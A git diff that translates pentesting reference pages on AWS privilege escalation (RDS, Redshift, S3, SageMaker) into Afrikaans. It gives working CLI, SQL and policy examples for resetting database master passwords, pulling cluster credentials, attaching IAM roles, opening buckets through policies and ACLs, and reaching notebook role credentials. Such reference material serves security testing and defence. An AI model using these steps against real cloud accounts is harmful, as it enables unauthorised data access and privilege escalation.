+Met daardie toestemming kan 'n aanvaller **die wagwoord van die meester gebruiker verander**, en die aanmelding binne die databasis:
 ```bash
 # Get the DB username, db name and address
 aws rds describe-db-instances
 
 # Modify the password and wait a couple of minutes
 aws rds modify-db-instance \
-    --db-instance-identifier <db-id> \
-    --master-user-password 'Llaody2f6.123' \
-    --apply-immediately
+--db-instance-identifier <db-id> \
+--master-user-password 'Llaody2f6.123' \
+--apply-immediately
 
 # In case of postgres
 psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>
 ```
-
 > [!WARNING]
-> You will need to be able to **contact to the database** (they are usually only accessible from inside networks).
+> Jy sal in staat moet wees om te **kontak met die databasis** (hulle is gewoonlik net vanaf binne-netwerke toeganklik).
 
-**Potential Impact:** Find sensitive info inside the databases.
+**Potensiële Impak:** Vind sensitiewe inligting binne die databasisse.
 
 ### rds-db:connect
 
-According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance.
+Volgens die [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) kan 'n gebruiker met hierdie toestemming aan die DB-instansie koppel.
 
-### Abuse RDS Role IAM permissions
+### Misbruik RDS Rol IAM toestemmings
 
 #### Postgresql (Aurora)
 
 > [!TIP]
-> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**.
-
-First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions:
+> As jy **`SELECT datname FROM pg_database;`** uitvoer en 'n databasis genaamd **`rdsadmin`** vind, weet jy jy is binne 'n **AWS postgresql databasis**.
 
+Eerstens kan jy kyk of hierdie databasis gebruik is om toegang te verkry tot enige ander AWS-diens. Jy kan dit nagaan deur na die geïnstalleerde uitbreidings te kyk:
 ```sql
 SELECT * FROM pg_extension;
 ```
+As jy iets soos **`aws_s3`** vind, kan jy aanneem dat hierdie databasis **'n soort toegang oor S3** het (daar is ander uitbreidings soos **`aws_ml`** en **`aws_lambda`**).
 
-If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**).
-
-Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has.
-
-Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+Ook, as jy toestemmings het om **`aws rds describe-db-clusters`** uit te voer, kan jy daar sien of die **kluster enige IAM Rol aangeheg het** in die veld **`AssociatedRoles`**. As daar enige is, kan jy aanneem dat die databasis **voorberei was om toegang tot ander AWS dienste** te hê. Gebaseer op die **naam van die rol** (of as jy die **toestemmings** van die rol kan kry) kan jy **raai** watter ekstra toegang die databasis het.
 
+Nou, om **'n lêer binne 'n emmer** te lees, moet jy die volle pad weet. Jy kan dit lees met:
 ```sql
 // Create table
 CREATE TABLE ttemp (col TEXT);
 
 // Create s3 uri
 SELECT aws_commons.create_s3_uri(
-   'test1234567890678', // Name of the bucket
-   'data.csv',          // Name of the file
-   'eu-west-1'          //region of the bucket
+'test1234567890678', // Name of the bucket
+'data.csv',          // Name of the file
+'eu-west-1'          //region of the bucket
 ) AS s3_uri \gset
 
 // Load file contents in table
@@ -76,98 +71,81 @@ SELECT * from ttemp;
 // Delete table
 DROP TABLE ttemp;
 ```
-
-If you had **raw AWS credentials** you could also use them to access S3 data with:
-
+As jy **raw AWS-akkrediteerings** gehad het, kon jy dit ook gebruik om toegang tot S3-data te verkry met:
 ```sql
 SELECT aws_s3.table_import_from_s3(
-   't', '', '(format csv)',
-   :'s3_uri',
-   aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
+'t', '', '(format csv)',
+:'s3_uri',
+aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
 );
 ```
-
 > [!NOTE]
-> Postgresql **doesn't need to change any parameter group variable** to be able to access S3.
+> Postgresql **hoef nie enige parameter groep veranderlike te verander** om toegang tot S3 te verkry nie.
 
 #### Mysql (Aurora)
 
 > [!TIP]
-> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**.
+> Binne 'n mysql, as jy die navraag **`SELECT User, Host FROM mysql.user;`** uitvoer en daar is 'n gebruiker genaamd **`rdsadmin`**, kan jy aanneem jy is binne 'n **AWS RDS mysql db**.
 
-Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data.
+Binne die mysql voer **`show variables;`** uit en as die veranderlikes soos **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, waardes het, kan jy aanneem die databasis is voorberei om toegang tot S3 data te verkry.
 
-Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services).
-
-Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+Ook, as jy toestemmings het om **`aws rds describe-db-clusters`** uit te voer, kan jy nagaan of die kluster enige **geassosieerde rol** het, wat gewoonlik toegang tot AWS dienste beteken).
 
+Nou, om **'n lêer binne 'n emmer** te lees, moet jy die volle pad weet. Jy kan dit lees met:
 ```sql
 CREATE TABLE ttemp (col TEXT);
 LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
 SELECT * FROM ttemp;
 DROP TABLE ttemp;
 ```
-
 ### `rds:AddRoleToDBCluster`, `iam:PassRole`
 
-An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
-
+'n Aanvaller met die toestemmings `rds:AddRoleToDBCluster` en `iam:PassRole` kan **'n gespesifiseerde rol aan 'n bestaande RDS-instantie voeg**. Dit kan die aanvaller in staat stel om **sensitiewe data te bekom** of die data binne die instantie te wysig.
 ```bash
 aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>
 ```
-
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\
-Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also.
+**Potensiële Impak**: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie.\
+Let daarop dat sommige DB's addisionele konfigurasies vereis soos Mysql, wat die rol ARN in die parameter groepe moet spesifiseer.
 
 ### `rds:CreateDBInstance`
 
-Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet:
-
+Net met hierdie toestemming kan 'n aanvaller 'n **nuwe instansie binne 'n kluster** wat reeds bestaan en 'n **IAM rol** aangeheg het, skep. Hy sal nie in staat wees om die meester gebruikerswagwoord te verander nie, maar hy mag in staat wees om die nuwe databasisinstansie aan die internet bloot te stel:
 ```bash
 aws --region eu-west-1 --profile none-priv rds create-db-instance \
-    --db-instance-identifier mydbinstance2 \
-    --db-instance-class db.t3.medium \
-    --engine aurora-postgresql \
-    --db-cluster-identifier database-1 \
-    --db-security-groups "string" \
-    --publicly-accessible
+--db-instance-identifier mydbinstance2 \
+--db-instance-class db.t3.medium \
+--engine aurora-postgresql \
+--db-cluster-identifier database-1 \
+--db-security-groups "string" \
+--publicly-accessible
 ```
-
 ### `rds:CreateDBInstance`, `iam:PassRole`
 
 > [!NOTE]
-> TODO: Test
+> TODO: Toets
 
-An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance.
+An aanvaller met die toestemmings `rds:CreateDBInstance` en `iam:PassRole` kan **nuwe RDS-instantie met 'n spesifieke rol aangeheg**. Die aanvaller kan dan moontlik **toegang tot sensitiewe data** verkry of die data binne die instantie verander.
 
 > [!WARNING]
-> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):
-
-> - The profile must exist in your account.
-> - The profile must have an IAM role that Amazon EC2 has permissions to assume.
-> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` .
+> Sommige vereistes van die rol/instansie-profiel om aan te heg (van [**hier**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):
 
+> - Die profiel moet in jou rekening bestaan.
+> - Die profiel moet 'n IAM-rol hê wat Amazon EC2 toestemming het om aan te neem.
+> - Die instansie-profielnaam en die geassosieerde IAM-rolnaam moet met die voorvoegsel `AWSRDSCustom` begin.
 ```bash
 aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole
 ```
-
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
+**Potensiële Impak**: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie.
 
 ### `rds:AddRoleToDBInstance`, `iam:PassRole`
 
-An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
+'n Aanvaller met die regte `rds:AddRoleToDBInstance` en `iam:PassRole` kan **'n gespesifiseerde rol aan 'n bestaande RDS-instantie voeg**. Dit kan die aanvaller in staat stel om **toegang tot sensitiewe data** te verkry of die data binne die instantie te wysig.
 
 > [!WARNING]
-> The DB instance must be outside of a cluster for this
-
+> Die DB-instantie moet buite 'n kluster wees vir dit
 ```bash
 aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>
 ```
-
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
+**Potensiële Impak**: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instansie.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
index 825c16ad6..888e36291 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
@@ -4,7 +4,7 @@
 
 ## Redshift
 
-For more information about RDS check:
+Vir meer inligting oor RDS, kyk:
 
 {{#ref}}
 ../aws-services/aws-redshift-enum.md
@@ -12,52 +12,45 @@ For more information about RDS check:
 
 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
 
-With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it:
-
+Met hierdie toestemmings kan jy **inligting van al die klusters** verkry (insluitend naam en kluster gebruikersnaam) en **kredensiale** kry om toegang te verkry:
 ```bash
 # Get creds
 aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
 # Connect, even if the password is a base64 string, that is the password
 psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439
 ```
-
-**Potential Impact:** Find sensitive info inside the databases.
+**Potensiële Impak:** Vind sensitiewe inligting binne die databasisse.
 
 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
 
-With these permissions you can get **info of all the clusters** and **get credentials** to access it.\
-Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has.
-
+Met hierdie toestemmings kan jy **inligting van al die klusters** kry en **kredensiale** verkry om toegang te verkry.\
+Let daarop dat die postgres gebruiker die **toestemmings sal hê wat die IAM identiteit** wat gebruik is om die kredensiale te verkry, het.
 ```bash
 # Get creds
 aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
 # Connect, even if the password is a base64 string, that is the password
 psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
 ```
-
-**Potential Impact:** Find sensitive info inside the databases.
+**Potensiële Impak:** Vind sensitiewe inligting binne die databasisse.
 
 ### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
 
-It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
-
+Dit is moontlik om die **hoofwagwoord** van die interne postgres (redshit) gebruiker vanaf aws cli te **wysig** (Ek dink dit is die regte toestemmings wat jy nodig het, maar ek het dit nog nie getoets nie):
 ```
 aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;
 ```
+**Potensiële Impak:** Vind sensitiewe inligting binne die databasisse.
 
-**Potential Impact:** Find sensitive info inside the databases.
-
-## Accessing External Services
+## Toegang tot Eksterne Dienste
 
 > [!WARNING]
-> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned.
+> Om toegang te verkry tot al die volgende hulpbronne, sal jy **die rol wat gebruik moet word** moet **specifiseer**. 'n Redshift-kluster **kan 'n lys van AWS-rolle toegeken hê** wat jy kan gebruik **as jy die ARN ken** of jy kan net "**default**" stel om die standaard een wat toegeken is, te gebruik.
 
-> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
+> Boonop, soos [**hier verduidelik**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), laat Redshift ook toe om rolle te concat (solank die eerste een die tweede een kan aanvaar) om verdere toegang te verkry, maar net **deur** hulle met 'n **komma** te **skei**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
 
 ### Lambdas
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
-
+Soos verduidelik in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), is dit moontlik om **'n lambda-funksie vanaf redshift aan te roep** met iets soos:
 ```sql
 CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
 RETURNS INT
@@ -65,11 +58,9 @@ STABLE
 LAMBDA 'lambda_function'
 IAM_ROLE default;
 ```
-
 ### S3
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
-
+Soos verduidelik in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), is dit moontlik om **te lees en te skryf in S3-buckets**:
 ```sql
 # Read
 copy table from 's3://<your-bucket-name>/load/key_prefix'
@@ -82,30 +73,23 @@ unload ('select * from venue')
 to 's3://mybucket/tickit/unload/venue_'
 iam_role default;
 ```
-
 ### Dynamo
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**:
-
+Soos verduidelik in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), is dit moontlik om **data van dynamodb te verkry**:
 ```sql
 copy favoritemovies
 from 'dynamodb://ProductCatalog'
 iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
 ```
-
 > [!WARNING]
-> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.
+> Die Amazon DynamoDB tabel wat die data verskaf, moet in dieselfde AWS Region as jou kluster geskep word, tensy jy die [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) opsie gebruik om die AWS Region aan te dui waarin die Amazon DynamoDB tabel geleë is.
 
 ### EMR
 
-Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
+Kyk na [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
 
 ## References
 
 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
index 0af161cbc..c04a94f6f 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
@@ -6,117 +6,112 @@
 
 ### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject`
 
-An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.
-
-For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:
+'n Aanvaller met daardie toestemmings oor interessante emmers mag in staat wees om hulpbronne te kapen en voorregte te verhoog.
 
+Byvoorbeeld, 'n aanvaller met daardie **toestemmings oor 'n cloudformation-emmer** genaamd "cf-templates-nohnwfax6a6i-us-east-1" sal in staat wees om die ontplooiing te kapen. Die toegang kan gegee word met die volgende beleid:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": [
-        "s3:PutBucketNotification",
-        "s3:GetBucketNotification",
-        "s3:PutObject",
-        "s3:GetObject"
-      ],
-      "Resource": [
-        "arn:aws:s3:::cf-templates-*/*",
-        "arn:aws:s3:::cf-templates-*"
-      ]
-    },
-    {
-      "Effect": "Allow",
-      "Action": "s3:ListAllMyBuckets",
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": [
+"s3:PutBucketNotification",
+"s3:GetBucketNotification",
+"s3:PutObject",
+"s3:GetObject"
+],
+"Resource": [
+"arn:aws:s3:::cf-templates-*/*",
+"arn:aws:s3:::cf-templates-*"
+]
+},
+{
+"Effect": "Allow",
+"Action": "s3:ListAllMyBuckets",
+"Resource": "*"
+}
+]
 }
 ```
-
-And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**.
+En die kaping is moontlik omdat daar 'n **klein tydvenster is vanaf die oomblik dat die sjabloon na die emmer opgelaai word** tot die oomblik dat die **sjabloon ontplooi word**. 'n Aanvaller kan eenvoudig 'n **lambda-funksie** in sy rekening skep wat **geaktiveer word wanneer 'n emmer kennisgewing gestuur word**, en **kap** die **inhoud** van daardie **emmer**.
 
 ![](<../../../images/image (174).png>)
 
-The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\
-For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
+Die Pacu-module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) kan gebruik word om hierdie aanval te outomatiseer.\
+Vir meer inligting, kyk na die oorspronklike navorsing: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
 
 ### `s3:PutObject`, `s3:GetObject` <a href="#s3putobject-s3getobject" id="s3putobject-s3getobject"></a>
 
-These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\
-An attacker with **read access** to them might find **sensitive information** on them.\
-An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\
-These are some examples:
+Dit is die toestemmings om **objekte na S3 te kry en op te laai**. Verskeie dienste binne AWS (en buite dit) gebruik S3-stoor om **konfigurasie lêers** te stoor.\
+'n Aanvaller met **lees toegang** tot hulle kan **sensitiewe inligting** daarop vind.\
+'n Aanvaller met **skryf toegang** tot hulle kan **die data wysig om 'n diens te misbruik en probeer om voorregte te verhoog**.\
+Hierdie is 'n paar voorbeelde:
 
-- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**.
+- As 'n EC2-instantie die **gebruikersdata in 'n S3-emmer** stoor, kan 'n aanvaller dit wysig om **arbitraire kode binne die EC2-instantie uit te voer**.
 
 ### `s3:PutBucketPolicy`
 
-An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets.
-
+'n Aanvaller, wat moet wees **van dieselfde rekening**, anders sal die fout `Die gespesifiseerde metode is nie toegelaat nie` geaktiveer word, met hierdie toestemming sal in staat wees om vir homself meer toestemmings oor die emmer(s) toe te ken wat hom toelaat om emmers te lees, te skryf, te wysig, te verwyder en bloot te stel.
 ```bash
 # Update Bucket policy
 aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>
 
 ## JSON giving permissions to a user and mantaining some previous root access
 {
-    "Id": "Policy1568185116930",
-    "Version":"2012-10-17",
-    "Statement":[
-        {
-            "Effect":"Allow",
-            "Principal":{
-                "AWS":"arn:aws:iam::123123123123:root"
-            },
-            "Action":"s3:ListBucket",
-            "Resource":"arn:aws:s3:::somebucketname"
-        },
-        {
-            "Effect":"Allow",
-            "Principal":{
-                "AWS":"arn:aws:iam::123123123123:user/username"
-            },
-            "Action":"s3:*",
-            "Resource":"arn:aws:s3:::somebucketname/*"
-        }
-    ]
+"Id": "Policy1568185116930",
+"Version":"2012-10-17",
+"Statement":[
+{
+"Effect":"Allow",
+"Principal":{
+"AWS":"arn:aws:iam::123123123123:root"
+},
+"Action":"s3:ListBucket",
+"Resource":"arn:aws:s3:::somebucketname"
+},
+{
+"Effect":"Allow",
+"Principal":{
+"AWS":"arn:aws:iam::123123123123:user/username"
+},
+"Action":"s3:*",
+"Resource":"arn:aws:s3:::somebucketname/*"
+}
+]
 }
 
 ## JSON Public policy example
 ### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
 {
-  "Id": "Policy1568185116930",
-  "Version": "2012-10-17",
-  "Statement": [
-  {
-      "Sid": "Stmt1568184932403",
-      "Action": [
-        "s3:ListBucket"
-      ],
-      "Effect": "Allow",
-      "Resource": "arn:aws:s3:::welcome",
-      "Principal": "*"
-  },
-  {
-    "Sid": "Stmt1568185007451",
-    "Action": [
-      "s3:GetObject"
-    ],
-    "Effect": "Allow",
-    "Resource": "arn:aws:s3:::welcome/*",
-    "Principal": "*"
-  }
-  ]
+"Id": "Policy1568185116930",
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Stmt1568184932403",
+"Action": [
+"s3:ListBucket"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome",
+"Principal": "*"
+},
+{
+"Sid": "Stmt1568185007451",
+"Action": [
+"s3:GetObject"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome/*",
+"Principal": "*"
+}
+]
 }
 ```
-
 ### `s3:GetBucketAcl`, `s3:PutBucketAcl`
 
-An attacker could abuse these permissions to **grant him more access** over specific buckets.\
-Note that the attacker doesn't need to be from the same account. Moreover the write access
-
+'n Aanvaller kan hierdie toestemmings misbruik om **hom meer toegang te gee** oor spesifieke emmers.\
+Let daarop dat die aanvaller nie van dieselfde rekening hoef te wees nie. Boonop is die skryftoegang
 ```bash
 # Update bucket ACL
 aws s3api get-bucket-acl --bucket <bucket-name>
@@ -125,27 +120,25 @@ aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://a
 ##JSON ACL example
 ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
 {
-  "Owner": {
-    "DisplayName": "<DisplayName>",
-    "ID": "<ID>"
-  },
-  "Grants": [
-  {
-    "Grantee": {
-      "Type": "Group",
-      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
-    },
-  "Permission": "FULL_CONTROL"
-  }
-  ]
+"Owner": {
+"DisplayName": "<DisplayName>",
+"ID": "<ID>"
+},
+"Grants": [
+{
+"Grantee": {
+"Type": "Group",
+"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+},
+"Permission": "FULL_CONTROL"
+}
+]
 }
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
-
 ### `s3:GetObjectAcl`, `s3:PutObjectAcl`
 
-An attacker could abuse these permissions to grant him more access over specific objects inside buckets.
-
+'n Aanvaller kan hierdie toestemmings misbruik om hom meer toegang tot spesifieke voorwerpe binne emmers te verleen.
 ```bash
 # Update bucket object ACL
 aws s3api get-object-acl --bucket <bucekt-name> --key flag
@@ -154,34 +147,27 @@ aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-poli
 ##JSON ACL example
 ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
 {
-  "Owner": {
-    "DisplayName": "<DisplayName>",
-    "ID": "<ID>"
-  },
-  "Grants": [
-  {
-    "Grantee": {
-      "Type": "Group",
-      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
-    },
-  "Permission": "FULL_CONTROL"
-  }
-  ]
+"Owner": {
+"DisplayName": "<DisplayName>",
+"ID": "<ID>"
+},
+"Grants": [
+{
+"Grantee": {
+"Type": "Group",
+"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+},
+"Permission": "FULL_CONTROL"
+}
+]
 }
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
-
 ### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl`
 
-An attacker with these privileges is expected to be able to put an Acl to an specific object version
-
+'n Aanvaller met hierdie voorregte word verwag om 'n Acl op 'n spesifieke objekweergawe te kan plaas
 ```bash
 aws s3api get-object-acl --bucket <bucekt-name> --key flag
 aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
index 890686262..e5c8a2483 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -6,68 +6,60 @@
 
 ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
 
-Start creating a noteboook with the IAM Role to access attached to it:
-
+Begin om 'n notaboek te skep met die IAM Rol wat daaraan gekoppel is:
 ```bash
 aws sagemaker create-notebook-instance --notebook-instance-name example \
-    --instance-type ml.t2.medium \
-    --role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
+--instance-type ml.t2.medium \
+--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
 ```
-
-The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready:
-
+Die antwoord moet 'n `NotebookInstanceArn` veld bevat, wat die ARN van die nuut geskepte notaboekinstansie sal bevat. Ons kan dan die `create-presigned-notebook-instance-url` API gebruik om 'n URL te genereer wat ons kan gebruik om toegang tot die notaboekinstansie te verkry sodra dit gereed is:
 ```bash
 aws sagemaker create-presigned-notebook-instance-url \
-    --notebook-instance-name <name>
+--notebook-instance-name <name>
 ```
+Navigeer na die URL met die blaaier en klik op \`Open JupyterLab\` in die boonste regterkant, scroll dan af na die “Launcher” oortjie en onder die “Other” afdeling, klik die “Terminal” knoppie.
 
-Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button.
+Nou is dit moontlik om toegang te verkry tot die metadata geloofsbriewe van die IAM Rol.
 
-Now It's possible to access the metadata credentials of the IAM Role.
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potensiële Impak:** Privesc na die sagemaker diensrol wat gespesifiseer is.
 
 ### `sagemaker:CreatePresignedNotebookInstanceUrl`
 
